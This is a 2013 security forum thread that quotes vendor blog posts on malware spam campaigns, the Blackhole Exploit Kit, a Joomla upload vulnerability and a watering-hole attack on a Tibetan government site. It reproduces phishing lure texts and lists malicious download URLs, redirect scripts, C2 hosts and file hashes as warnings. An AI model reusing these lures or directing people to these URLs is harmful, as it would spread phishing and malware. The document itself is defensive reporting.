* http://blog.dynamoo.com/2013/06/hair-biostem-pump-and-dump-rakes-in.html
** http://www.nasdaq.com/symbol/hair
*** http://www.nasdaq.com/press-release/biostem-us-corporation-suspends-operations-20130717-01105
___
Current State of the Blackhole Exploit Kit
- http://blog.trendmicro.com/trendlabs-security-intelligence/the-current-state-of-the-blackhole-exploit-kit/
July 31, 2013 9:42 pm (UTC-7) - "The Blackhole Exploit Kit is one of the most notorious exploit kits currently in circulation among the cybercriminal underground today. Thus, we continuously monitor for incidents and attacks involving the exploit kit itself. Last week we reported about the spam campaign leveraging the birth of Prince William’s and Kate Middleton’s son. Our analysis of the campaign yielded its connection to other currently-ongoing campaigns that used other recent news events, such as the controversy surrounding the upcoming movie Ender’s Game. Some of the other connected campaigns also used Facebook and eBay as lures to get users to click malicious links.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/07/bhekEbay1.jpg
The volume of spammed messages related to this spam run reached up to 0.8% of all spam messages collected during the time period — a relatively large percentage compared to other runs. We’ve also identified a list of countries that we detect where the bulk of the spam is coming from...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/07/newbhektable2.png
... These recent developments regarding this particular exploit kit can certainly be disconcerting, but nothing particularly new in regards to BHEK being used in new, unpredictable ways. What we can glean from this, however, is that even such an old approach is still effective in getting victims, which means that more users need to be protected about this threat... Infection can be avoided by extra vigilance by users on not clicking on the links that present themselves through suspicious mails such as these. Other precautions include: always installing the latest Java security update... and using a web reputation security product..."
___
UPS Package Pickup Spam
- http://threattrack.tumblr.com/post/57066116667/ups-package-pickup-spam
Aug. 1, 2013 - "Subjects Seen:
UPS - Your package is available for pickup ( Parcel <removed> )
Typical e-mail details:
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.
Malicious URLs
bettersigns .net/ponyb/gate.php
50.57.185.72 :8080/ponyb/gate.php
arki .com :8080/ponyb/gate.php
web1w3.nfrance .com/bzfBGWP.exe
serw.myroitracking .com/kQYjoPqY.exe
442594-web1.youneedmedia .com/MM75.exe
ftp(DOT)jason-tooling .com/nhdx.exe
Malicious File Name and MD5:
UPS_Label_<date>.zip (199C2A4EED41CF642FBDDF60949A1DD3)
UPS-Label_<date>.exe (E1388381884E7434A0A559CAED63B677)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/130e7243c1c618647924df31a4aa1a7d/tumblr_inline_mquwubWDl91qz4rgp.png
:mad::fear:
AplusWebMaster
2013-08-02, 20:47
FYI...
Fake American Express Alerts
- https://isc.sans.edu/diary.html?storyid=16285
Last Updated: 2013-08-02 16:20:31 UTC - "Right now we are seeing -fake- American Express account alerts*. The alerts look very real, and will trick the user into clicking on a link that may lead to malware. As with many of these attacks, the exact destination will heavily depend on the browser used. Antivirus does recognize the intermediate scripts as malicious and should warn the user if configured to inspect web content."
* https://isc.sans.edu/diaryimages/images/Screen%20Shot%202013-08-02%20at%2012_08_22%20PM.png
American Express Spending Notification Spam
- http://threattrack.tumblr.com/post/57162394091/american-express-spending-notification-spam
Aug. 2, 2013 - "Subjects Seen:
Account Alert: Recent Charge Approved
Typical e-mail details:
Dear Customer,
Spend Activity since your last statement close date has reached the notification amount you set for your account.
Malicious URLs
blackamber .net/ulnq.html
medialifegroup .com/~medialifeyerel/xkaq.html
drstephenlwolman .com/topic/sessions-folk-binds.php
northernforestcanoetrail .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d421937f12b9806905830a0ce4217497/tumblr_inline_mqwugv1PGc1qz4rgp.png
___
MoneyGram Payment Notification Spam
- http://threattrack.tumblr.com/post/57160949542/moneygram-payment-notification-spam
Aug. 2, 2013 - "Subjects Seen:
Payment notification email
Typical e-mail details:
Dear client!
You are receiving this notification because of you have been received the payment.
It may take a few moment for this transaction to appear in the Recent Activity list on your account page.
Payment details
Transaction sum: 950 USD
Transaction date: 2013/08/02
View the details of this transaction online
Thank you for using MoneyGram services!
Malicious URLs
blackamber .net/ulnq.html
medialifegroup .com/~medialifeyerel/xkaq.html
drstephenlwolman .com/topic/sessions-folk-binds.php
northernforestcanoetrail .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/838bfd89a16f2e7dd1df0382b56de84d/tumblr_inline_mqwtbf4BM61qz4rgp.png
___
NACHA Direct Deposit was Declined Spam
- http://threattrack.tumblr.com/post/57171844820/nacha-direct-deposit-was-declined-spam
2 August 2013 - "Subjects Seen:
Direct Deposit payment was declined
Typical e-mail details:
Attn: Chief Accountant
Please be informed, that your most recent Direct Deposit payment (<removed>) was cancelled,because your business software package was out of date. Please use the link below to enter the secure section of our web site and see the details::
Click here for more information
Please refer to your financial institution to obtain your updated version of the software needed.
Sincerely yours
ACH Network Rules Department
Malicious URLs
24-7datura .com/wp-sts.php?2HWU2JNHOTU80DVU
zippierearliest .in/closest/i9jfuhioejskveohnuojfir.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e56afd6f72353a44e2d67d9b351064e7/tumblr_inline_mqx0zsTrzI1qz4rgp.png
___
Fake Discover Card SPAM / capitalagreements .com
- http://blog.dynamoo.com/2013/08/your-most-recent-payment-has-been.html
2 August 2013 - "This fake Discover Card spam leads to malware on capitalagreements .com:
Date: Fri, 2 Aug 2013 20:41:09 +0200 [14:41:09 EDT]
From: Discover Card [dontrply .service.discovercard .com]
Reply-To: dontrply @service.discovercard .com
Discover
Access My Account
ACCOUNT CONFIRMATION Statements | Payments | Rewards
Your most recent payment has been processed.
Dear Customer,
This e-mail is to confirm that we have processed your most recent payment. Please remember to use your new information the next time you log in.
To view more details please click here.
Log In to review your account details or to make additional changes...
Screenshot: https://lh3.ggpht.com/-8026dlem4nw/UfwAlX00pnI/AAAAAAAABqk/FgzguSvT0yk/s1600/discover-card.png
The link in the email goes to a legitimate -hacked- site and then to one of three scripts as follows:
[donotclick]ekaterini.mainsys .gr/overspreading/hermaphrodite.js
[donotclick]sisgroup .co .uk/despairs/marveled.js
[donotclick]psik.aplus .pl/christian/pickford.js
After that, the victim is directed to the malware landing page at [donotclick]capitalagreements .com/topic/regard_alternate_sheet.php which is a hijacked GoDaddy domain hosted on 66.228.60.243 (Linode, US), along with several other hijacked domains.
The attack is fundamentally the same as this American Express themed malspam run described here*.
Recommended blocklist: ... "
* http://techhelplist.com/index.php/spam-list/293-account-alert-recent-charge-approved-malware
:fear::mad:
AplusWebMaster
2013-08-11, 22:08
FYI...
Fake Apple Store Gift Card SPAM ...
- http://threattrack.tumblr.com/post/57701798476/apple-store-gift-card-spam
August 9, 2013 - "Subjects Seen:
Apple Store Gift Card
Typical e-mail details:
Apple Store Gift Card
Dear client! You got our $100 Apple Store Gift Card.
Apple Store Gift Cards can be applied to buy Apple hardware and accessories at any Apple Retail Store, the Apple Online Store,
or over the phone by calling 1-800-MY-APPLE.
Please follow the link or read the attachment to get the Apple Store Gift Card code.
Malicious URLs
kidscareinternationalschool .com/f2eyvyj.html
nsmontessoricenter .com/fz13t.html
stevecozz .com/topic/sessions-folk-binds.php
Malicious File Name and MD5:
GiftCard28493.zip (F4B3986EE1828BDCDD46EE412BE0BA61)
Apple gift card.exe (74CFF87704AEC030D7AD1171366AFF87)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c0c0ff5016c711df543d9a010a0a0525/tumblr_inline_mr7syuZiMr1qz4rgp.png
- http://blog.webroot.com/2013/08/09/fake-apple-store-gift-card-themed-emails-serve-client-side-exploits-and-malware/
August 9, 2013 - "Apple Store users, beware! A currently ongoing malicious spam campaign is attempting to trick users into thinking that they’ve successfully received a legitimate ‘Gift Card’ worth $200. What’s particularly interesting about this campaign is that the cybercriminal(s) behind it are mixing the infection vectors by relying on both a malicious attachment and a link to the same malware found in the malicious emails. Users can become infected by either executing the attachment or by clicking on the client-side exploits serving link found in the emails...
Sample screenshot of the spamvertised email:
> http://webrootblog.files.wordpress.com/2013/08/apple_store_fake_email_spam_malicious_gift_card_malware_exploits_malicious_software_social_engineering.png
... MD5: 74cff87704aec030d7ad1171366aff87 * ... UDS:DangerousObject.Multi.Generic; PWSZbot-FBX!74CFF87704AE.
... sampled client-side exploit: MD5: 91cb051d427bd7b679e1abc99983338e ** ... Mal/ExpJava-F..."
(More detail at the websense URL above.)
* https://www.virustotal.com/en/file/6edb372155e4f4ed37c47d6100cce836266674db1e502fd4ff9d7728ec52a794/analysis/
File name: Apple gift card.exe
Detection ratio: 24/44
Analysis date: 2013-08-09 14:03:28 UTC
** https://www.virustotal.com/en/file/d1d127d60ca94a8a1779c9d978c4eadfdd5dbb3683a87f2bd1cbc963b09a9a36/analysis/
File name: java-exploit-from-173.246.105.15.jar
Detection ratio: 4/45
Analysis date: 2013-08-11 05:11:11 UTC
- https://www.virustotal.com/en/ip-address/173.246.105.15/information/
Diagnostic page for AS29169 (GANDI-AS)
- http://google.com/safebrowsing/diagnostic?site=AS:29169
"... over the past 90 days, 204 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-08-12, and the last time suspicious content was found was on 2013-08-11... we found 12 site(s) on this network... that appeared to function as intermediaries for the infection of 71 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 91 site(s)... that infected 407 other site(s)..."
:mad::fear::mad:
AplusWebMaster
2013-08-12, 23:16
FYI...
Hack threatens outdated Joomla sites
- http://krebsonsecurity.com/2013/08/simple-hack-threatens-oudated-joomla-sites/
Aug. 12, 2012 - "If you run a site powered by the Joomla content management system and haven’t yet applied a critical update for this software released less than two weeks ago, please take a moment to do that: A trivial exploit could let users inject malicious content into your site, turning it into a phishing or malware trap for visitors. The patch* released on July 31, 2013 applies to Joomla 2.5.13 and earlier 2.5.x versions, as well as Joomla 3.1.4 and earlier 3.x versions... For sites powered by unsupported versions of Joomla (1.5.x, and a cursory Google search indicates that there are tens of thousands of these 1.5.x sites currently online), attackers do not even need to have an account on the Joomla server for this hack to work... Earlier this month, security firm Arbor Networks warned** that it was tracking a Web site botnet dubbed “Fort Disco” which was made up of hacked Joomla and WordPress sites. Earlier in the year, Web site security firm Incapsula*** said it had tracked more than 90,000 Web sites powered by WordPress that were backdoored with malicious code."
* http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads
** http://www.arbornetworks.com/asert/2013/08/fort-disco-bruteforce-campaign/
*** http://krebsonsecurity.com/2013/04/brute-force-attacks-build-wordpress-botnet/
- https://net-security.org/secworld.php?id=15407
14 August 2013
- https://secunia.com/advisories/54326/
Release Date: 2013-08-02
Where: From remote
Impact: System access
Solution Status: Vendor Patch
Software: Joomla! 2.x, 3.x
... vulnerability is confirmed in version 3.1.4 and reported in versions prior to 2.5.14 and 3.1.5.
Solution: Update to version 2.5.14 or 3.1.5 *
- https://atlas.arbor.net/briefs/index#-740710151
High Severity
August 16, 2013 23:24
Joomla is a hot target for attackers of varying motives. This recent security patch should be installed in order to reduce attacks.
Analysis: Thousands of compromised Joomla sites are currently being used in botnets and vulnerabilities like this make the attacker's job even easier. The fact that this security hole was used to attack financial users in Europe, the Middle East and Asia and re-direct them to the popular Black Hole Exploit Kit is a testament to the criminal value of such security holes. Financial users mean money and bank accounts and other types of access, so it is a smart attack on the part of the attackers but could be very damaging for any user that was out of date and subject to exploitation, which could lead to installs of malware such as Zeus, P2P Zeus, Citadel or other banking malware.
Source: http://threatpost.com/joomla-patches-zero-day-targeting-emea-banks/101976
___
Virgin Media Bill Spam
- http://threattrack.tumblr.com/post/58065662184/virgin-media-bill-spam
Aug. 12, 2012 - "Subjects Seen:
Your Virgin Media bill is ready
Typical e-mail details:
Hello,
Your Virgin Media bill is ready and waiting for you.
Malicious File Name and MD5:
latest bill ref.<random>.pdf.zip (547845B4164A7029E19CB8D5FEC97234)
latest bill ref.<random>.pdf.exe (8D44660D20DF2A03DB9F1A981902A392)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e83a2bab34f1c1b08bfc5270fcda8876/tumblr_inline_mrfe9mPBWr1qz4rgp.png
___
Fake Facebook SPAM / guterhelmet .com
- http://blog.dynamoo.com/2013/08/facebook-spam-guterhelmetcom.html
12 August 2013 - "This fake Facebook spam leads to malware on guterhelmet .com:
Date: Mon, 12 Aug 2013 17:51:17 -0200 [15:51:17 EDT]
From: Facebook [update+zj433fgc2_aay @facebookmail .com]
Subject: Willie Powell wants to be friends with you on Facebook.
facebook
interesting pages on facebook
mark as favorite web pages that interest you to receive their updates in your news feed.
Willie Powell
Bao Aguliar
Bibi Akel
Eleanora Casella
Murray Carsten
Jordana Fiqueroa
Jona Fiorelli
Leisha Heape
Lacresha Hautala
Monnie Carrillo
Missy Carreiro
find more pages
go to facebook
the message was sent to {mailto_username} @ {mailto_domain}...
Is it me, or does everyone look the same?
> https://lh3.ggpht.com/-8Laq2BN98T8/Ugk_zRYHaqI/AAAAAAAABwY/b8u6XfspbSk/s1600/facebook3.png
... The link in the email goes through a legitimate -hacked- site and then on to one of three scripts:
[donotclick]golift .biz/lisps/seventeen.js
[donotclick]fh-efront .clickandlearn.at/parboiled/couplets.js
[donotclick]ftp.elotus .org/products/cleats.js
From there, the victim is -redirected- to a -hijacked- GoDaddy domain with a malicious payload at [donotclick]guterhelmet .com/topic/able_disturb_planning.php hosted on 192.81.135.132 (Linode, US) along with a number of other hijacked domains...
Recommended blocklist: ... "
- https://www.virustotal.com/en/ip-address/192.81.135.132/information/
___
Gap between Google Play and AV vendors on adware classification
- http://research.zscaler.com/2013/08/normal-0-false-false-false-en-us-x-none_8.html
August 8, 2013 - "Two critical items impacting mobile use are privacy and a positive user experience. The mobile app market is built on trust. Questionable mobile advertising practices, such as apps employing deceptive adware practices, negatively impact the end user’s perception of both privacy and the user experience. Doing things like capturing personal information such as email addresses, device IDs, IMEIs, etc. without properly notifying users and modifying phone settings and desktops without consent, is annoying and unacceptable for mobile users. While the majority of mobile ads are not malicious, they are undesirable for most. Zscaler regularly analyzes applications in the Google Play store to profile apps and identify those presenting security and privacy risks. By studying this data, we have come up with some interesting statistics concerning the prevalence of ‘adware’ in apps permitted into the Google Play store... Why are AV vendors flagging a huge number of applications as adware while Google is freely permitting them into the Google Play store? The excessive use of advertisements can negatively impact customer privacy and result in a -negative- user experience. On the other hand, advertisements are necessary for app developers looking to earn money when providing free apps. So where should the line be drawn? Google has clearly chosen to be very -lenient- with aggressive advertising practices, while Apple has taken the opposite approach, as they have shown that they’re willing to sacrifice advertising revenue to provide a positive user experience, even restricting the ability of advertisers to track device IDs and MAC addresses. How do we define adware? We feel that adware exhibits one or more of the following intrusive behaviors without requesting appropriate user consent (ref- Lookout Blog*)..."
(More detail and graphic charts at the zscaler URL above.)
* https://blog.lookout.com/blog/2013/06/26/lookout-flags-newly-classified-adware/
___
Central Tibetan admin website strategically compromised as part of Watering Hole Attack
- https://www.securelist.com/en/blog/9144/Central_Tibetan_Administration_Website_Strategically_Compromised_as_Part_of_Watering_Hole_Attack
August 12, 2013 - "A snippet of code on the Central Tibetan Administration website redirects CN-speaking visitors to a Java exploit that drops an APT-related backdoor. For some context, the site claims the administration itself as "...the Central Tibetan Administration (CTA) of His Holiness the Dalai Lama, this is the continuation of the government of independent Tibet." The selection of placement for the malicious code is fairly extraordinary... The attack itself is precisely targeted, as an appended, embedded iframe redirects "xizang-zhiye(dot)org" visitors (this is the CN-translated version of the site) to a Java exploit that maintains a backdoor payload. The English and Tibetan versions of the website do not maintain this embedded iframe on the Chinese version (please do not visit at this time). At this point in time, it seems that the few systems attacked with this code are located in China and the US, although there could be more. The Java exploit being delivered is the 212kb "YPVo.jar" (edd8b301eeb083e9fdf0ae3a9bdb3cd6), which archives, drops and executes the backdoor as well. That file is a 397 kb win32 executable "aMCBlHPl.exe" (a6d7edc77e745a91b1fc6be985994c6a) detected as "Trojan.Win32.Swisyn.cyxf". Backdoors detected with the Swisyn verdict are frequently a part of APT related toolchains, and this one most certainly is... The Java exploit appears to attack the older CVE-2012-4681 vulnerability, which is a bit of a surprise, but it was used by the actor distributing the original CVE-2012-4681 0day Gondzz.class and Gondvv.class in August of last year... The Payload.main method contains some interesting but simple capabilities that enable an attacker to download the payload over https and AES decrypt it using Java's built-in AES crypto libraries, but the package is not configured to use that code in this case. Instead, a couple of lines in its configuration file direct the exploit to drop and execute the jar file's win32 exe resource.
The backdoor itself is detected by most of the AV crowd as variants of gaming password stealers, which is flatly incorrect. The related C2 is located at news.worldlinking .com (59.188.239.46)... This threat actor has been quietly operating these sorts of watering hole attacks for at least a couple of years and also the standard spearphishing campaigns against a variety of targets that include Tibetan groups. Our KSN community recorded related events going back to at least a busy late 2011 season. We also show Apple related Java exploits from this server targeting the more recent CVE-2013-2423..."
- https://www.virustotal.com/en/ip-address/59.188.239.46/information/
- http://google.com/safebrowsing/diagnostic?site=AS:17444
:fear::fear: :mad: